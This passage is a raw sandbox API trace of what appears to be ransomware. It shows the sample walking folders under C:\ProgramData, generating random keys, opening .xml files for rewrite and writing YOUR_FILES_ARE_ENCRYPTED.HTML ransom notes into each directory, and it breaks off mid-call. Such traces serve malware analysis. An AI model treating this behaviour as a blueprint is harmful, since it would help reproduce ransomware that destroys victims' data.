[0156.765] PathFindExtensionW (pszPath="tasks.xml") returned=".xml" [0156.765] lstrlenW (lpString=".xml") returned 4 [0156.765] PathFindExtensionW (pszPath="tasks.xml") returned=".xml" [0156.765] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0156.765] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0156.766] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64855184, ftCreationTime.dwHighDateTime=0x1ca0409, ftLastAccessTime.dwLowDateTime=0x64855184, ftLastAccessTime.dwHighDateTime=0x1ca0409, ftLastWriteTime.dwLowDateTime=0x1137e43c, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x1b9f4, dwReserved0=0x0, dwReserved1=0x60, cFileName="wmp.ico", cAlternateFileName="")) returned 1 [0156.766] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico") returned 93 [0156.766] lstrcmpW (lpString1="wmp.ico", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.766] PathFindExtensionW (pszPath="wmp.ico") returned=".ico" [0156.766] lstrlenW (lpString=".ico") returned 4 [0156.766] PathFindExtensionW (pszPath="wmp.ico") returned=".ico" [0156.766] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64855184, ftCreationTime.dwHighDateTime=0x1ca0409, ftLastAccessTime.dwLowDateTime=0x64855184, ftLastAccessTime.dwHighDateTime=0x1ca0409, ftLastWriteTime.dwLowDateTime=0x1137e43c, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x1b9f4, dwReserved0=0x0, dwReserved1=0x60, cFileName="wmp.ico", cAlternateFileName="")) returned 0 [0156.766] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0156.766] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 115 [0156.766] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x598 [0156.767] WriteFile (in: hFile=0x598, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0156.768] CloseHandle (hObject=0x598) returned 1 [0156.769] GetProcessHeap () returned 0x270000 [0156.770] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0156.770] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9ebda38, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x917f121e, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x917f121e, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", cAlternateFileName="{E35BE~1")) returned 1 [0156.770] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}") returned 85 [0156.770] GetProcessHeap () returned 0x270000 [0156.770] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0156.770] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}" [0156.770] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*" [0156.770] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9ebda38, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x917f121e, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x917f121e, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0156.772] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9ebda38, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x917f121e, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x917f121e, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0156.772] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x917f121e, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0x96010446, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x917f121e, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="en-US", cAlternateFileName="")) returned 1 [0156.772] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US") returned 91 [0156.772] GetProcessHeap () returned 0x270000 [0156.772] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7400058 [0156.772] lstrcpyW (in: lpString1=0x7400058, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US" [0156.773] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\*" [0156.773] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x917f121e, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0x96010446, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x917f121e, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0156.773] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x917f121e, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0x96010446, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x917f121e, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0156.773] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84f5f4ea, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0x852ccb00, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x84f5f4ea, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x5e8, dwReserved0=0x0, dwReserved1=0x60, cFileName="resource.xml", cAlternateFileName="")) returned 1 [0156.773] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml") returned 104 [0156.773] lstrcmpW (lpString1="resource.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.773] PathFindExtensionW (pszPath="resource.xml") returned=".xml" [0156.773] lstrlenW (lpString=".xml") returned 4 [0156.773] PathFindExtensionW (pszPath="resource.xml") returned=".xml" [0156.773] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0156.773] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\resource.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0156.774] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84f5f4ea, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0x852ccb00, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x84f5f4ea, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x5e8, dwReserved0=0x0, dwReserved1=0x60, cFileName="resource.xml", cAlternateFileName="")) returned 0 [0156.774] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0156.774] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 121 [0156.774] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0156.774] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0156.776] CloseHandle (hObject=0x5a0) returned 1 [0156.777] GetProcessHeap () returned 0x270000 [0156.778] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7400058 | out: hHeap=0x270000) returned 1 [0156.778] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa84024fc, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0xa84024fc, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0x1d8ea4dc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0xd0a3, dwReserved0=0x0, dwReserved1=0x60, cFileName="folder.ico", cAlternateFileName="")) returned 1 [0156.778] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico") returned 96 [0156.778] lstrcmpW (lpString1="folder.ico", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.778] PathFindExtensionW (pszPath="folder.ico") returned=".ico" [0156.778] lstrlenW (lpString=".ico") returned 4 [0156.778] PathFindExtensionW (pszPath="folder.ico") returned=".ico" [0156.778] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8343e21, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0xa8343e21, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0x1d8ea4dc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0xe3c8, dwReserved0=0x0, dwReserved1=0x60, cFileName="print_pref.ico", cAlternateFileName="")) returned 1 [0156.778] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico") returned 100 [0156.778] lstrcmpW (lpString1="print_pref.ico", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.778] PathFindExtensionW (pszPath="print_pref.ico") returned=".ico" [0156.778] lstrlenW (lpString=".ico") returned 4 [0156.778] PathFindExtensionW (pszPath="print_pref.ico") returned=".ico" [0156.778] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8369f80, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0xa8369f80, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0x1d91063c, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0xebb8, dwReserved0=0x0, dwReserved1=0x60, cFileName="print_property.ico", cAlternateFileName="")) returned 1 [0156.778] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico") returned 104 [0156.778] lstrcmpW (lpString1="print_property.ico", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.778] PathFindExtensionW (pszPath="print_property.ico") returned=".ico" [0156.778] lstrlenW (lpString=".ico") returned 4 [0156.778] PathFindExtensionW (pszPath="print_property.ico") returned=".ico" [0156.778] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa83b623e, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0xa83b623e, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0x1d91063c, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0xdff5, dwReserved0=0x0, dwReserved1=0x60, cFileName="print_queue.ico", cAlternateFileName="")) returned 1 [0156.778] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico") returned 101 [0156.778] lstrcmpW (lpString1="print_queue.ico", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.778] PathFindExtensionW (pszPath="print_queue.ico") returned=".ico" [0156.778] lstrlenW (lpString=".ico") returned 4 [0156.778] PathFindExtensionW (pszPath="print_queue.ico") returned=".ico" [0156.778] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa83b623e, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0xa83b623e, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0x1d9a8bbc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0xec75, dwReserved0=0x0, dwReserved1=0x60, cFileName="scan_.ico", cAlternateFileName="")) returned 1 [0156.778] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico") returned 95 [0156.778] lstrcmpW (lpString1="scan_.ico", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.779] PathFindExtensionW (pszPath="scan_.ico") returned=".ico" [0156.779] lstrlenW (lpString=".ico") returned 4 [0156.779] PathFindExtensionW (pszPath="scan_.ico") returned=".ico" [0156.779] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa84024fc, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0xa84024fc, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0x1d9a8bbc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x10654, dwReserved0=0x0, dwReserved1=0x60, cFileName="scan_property.ico", cAlternateFileName="")) returned 1 [0156.779] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico") returned 103 [0156.779] lstrcmpW (lpString1="scan_property.ico", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.779] PathFindExtensionW (pszPath="scan_property.ico") returned=".ico" [0156.779] lstrlenW (lpString=".ico") returned 4 [0156.779] PathFindExtensionW (pszPath="scan_property.ico") returned=".ico" [0156.779] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa83dc39d, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0xa83dc39d, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0x1d9a8bbc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0xf8c2, dwReserved0=0x0, dwReserved1=0x60, cFileName="scan_settings.ico", cAlternateFileName="")) returned 1 [0156.779] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico") returned 103 [0156.779] lstrcmpW (lpString1="scan_settings.ico", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.779] PathFindExtensionW (pszPath="scan_settings.ico") returned=".ico" [0156.779] lstrlenW (lpString=".ico") returned 4 [0156.779] PathFindExtensionW (pszPath="scan_settings.ico") returned=".ico" [0156.779] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8213329, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0xa8213329, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0x1daff81c, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x2c64, dwReserved0=0x0, dwReserved1=0x60, cFileName="tasks.xml", cAlternateFileName="")) returned 1 [0156.779] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml") returned 95 [0156.779] lstrcmpW (lpString1="tasks.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.779] PathFindExtensionW (pszPath="tasks.xml") returned=".xml" [0156.779] lstrlenW (lpString=".xml") returned 4 [0156.779] PathFindExtensionW (pszPath="tasks.xml") returned=".xml" [0156.779] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0156.779] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0156.779] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8213329, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0xa8213329, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0x1daff81c, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x2c64, dwReserved0=0x0, dwReserved1=0x60, cFileName="tasks.xml", cAlternateFileName="")) returned 0 [0156.779] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0156.780] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 115 [0156.780] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x598 [0156.780] WriteFile (in: hFile=0x598, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0156.782] CloseHandle (hObject=0x598) returned 1 [0156.782] GetProcessHeap () returned 0x270000 [0156.783] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0156.783] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9ebda38, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x917f121e, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x917f121e, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", cAlternateFileName="{E35BE~1")) returned 0 [0156.783] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0156.783] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 76 [0156.783] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0156.786] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0156.787] CloseHandle (hObject=0x58c) returned 1 [0156.788] GetProcessHeap () returned 0x270000 [0156.789] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0156.789] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | 